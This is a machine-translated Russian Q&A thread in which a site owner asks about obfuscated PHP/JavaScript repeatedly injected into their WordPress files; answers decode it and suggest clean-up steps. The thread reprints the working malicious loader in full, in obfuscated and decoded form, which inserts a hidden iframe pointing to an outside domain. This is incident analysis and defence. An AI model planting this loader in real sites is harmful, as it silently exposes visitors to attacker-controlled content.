Злоумышленник js автоматически вводит в мои файлы header.php и многие другие js-файлы?

Question

В настоящее время я сталкиваюсь с адом, как ситуация, четыре из моих клиентских сайтов были взломаны до 10 дней. Я много перепутал с ними, и три из них работают нормально (бег magento) после моего долгого беспорядка с ними, но один из них (бегущий текстовый пресс) по-прежнему сталкивается с такой же ситуацией, и я не мог понять, что происходит на, после определенного времени в JS-файлы и некоторые PHP файлы тоже автоматически инъекционного с такого кода:

<? 
#ded509# 
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++)  {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>"; 
#/ded509# 
?> 

Этот код впрыскивается во всех JS-файлы и основные файлы, я изменил передачи файлов паролей, я проверил хрон рабочие места, и вручную я искал для любого PHP-кода (я чувствую, что какой-то код php делает это), но я не могу понять это, и да, я пытался декодировать этот код и попытался получить функциональность для этого кода, но удаление этого вредоносного кода из моих js-файлов сделает мой сайт прекрасным в течение некоторого времени, но после случайного времени скрипты будут автоматически распознаваться с этим кодом? что это за код js? Будет очень полезно, если кто-нибудь объяснит, что происходит на самом деле?

Answer 1

Это PHP эхо это

<script type="text/javascript" language="javascript" > e=eval;v="0x";a=0;try{a&=2}catch(q){a=1}if(!a){try{document["body"]^=~1;}catch(q){a2="!"}z="2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2);s="";if(window.document)for(i=0;i<z.length;i++)  {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script> 

В читаемом виде она выглядит следующим образом

e = eval; 

v = "0x"; 
a = 0; 
try { 
    a &= 2 
} catch (q) { 
    a = 1 
} 
if (!a) { 
    try { 
     document["body"] ^= ~1; 
    } catch (q) { 
     a2 = "!" 
    } 
    z = "2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42".split(a2); 
    s = ""; 
    if (window.document) for (i = 0; i < z.length; i++) { 
      s += String.fromCharCode(e(v + (z[i])) - 7); 
    } 
    zaz = s; 
    e(zaz); 
} 

В приведенном выше коде e функция eval

Если мы удалим Eval и печатает содержимое zaz будет выглядеть так.

(function() { 
    var c = document.createElement('iframe'); 

    c.src = 'http://jakyskyf.ru/count16.php'; 
    c.style.position = 'absolute'; 
    c.style.border = '0'; 
    c.style.height = '1px'; 
    c.style.width = '1px'; 
    c.style.left = '1px'; 
    c.style.top = '1px'; 

    if (!document.getElementById('c')) { 
     document.write('<div id=\'c\'></div>'); 
     document.getElementById('c').appendChild(c); 
    } 
})(); 

Его самоисполняющаяся анонимная функция. Сценарий создает iframe на вашей странице и загружает содержимое с http://jakyskyf.ru/count16.php

Если ваш сервер размещен на общем сервере, возможно, сама учетная запись администратора скомпрометирована.

Вещи, которые вы можете сделать.

• Ваше лучшее место для проверки - это журналы сервера. Проверьте наличие некоторых вредоносных записей.
• Обратитесь к поставщику услуг хостинга.
• Измените свой пароль на надежный пароль.
• Обычно на сайтах Wordpress эта вещь случается (это произошло во многих моих сайтах Wordpress). Если вы используете обновление Wordpress до последней версии.
• Измените имя пользователя admin с admin на другое имя.
• Измените адрес электронной почты администратора и пароль. Хакер, возможно, изменил его.

Эти ссылки обеспечат вам больше входов

• Iframe Virus
• Iframe injection attack
• Server wide iFrame injection attacks
• Hidden iFrame injection attacks

Answer 2

Вам нужно будет изменить разрешения файлов корневого каталога или файлы, которые повторно взломаны до 444. Убедитесь, что вы изменяете разрешения всех файлов index.php/html и файлов .htaccess только для чтения. Также дается справочник js и 555 прав доступа.

Это быстрое решение, чтобы перестать быть спамом снова и снова. Чтобы найти корень этого, вам нужно будет проверить свои записи в базе данных для таких распространенных форм, как contact_us и т. Д., Которые могут принимать сценарии без надлежащих фильтров санитаризации. Также удалите любые неизвестные файлы из корневого каталога.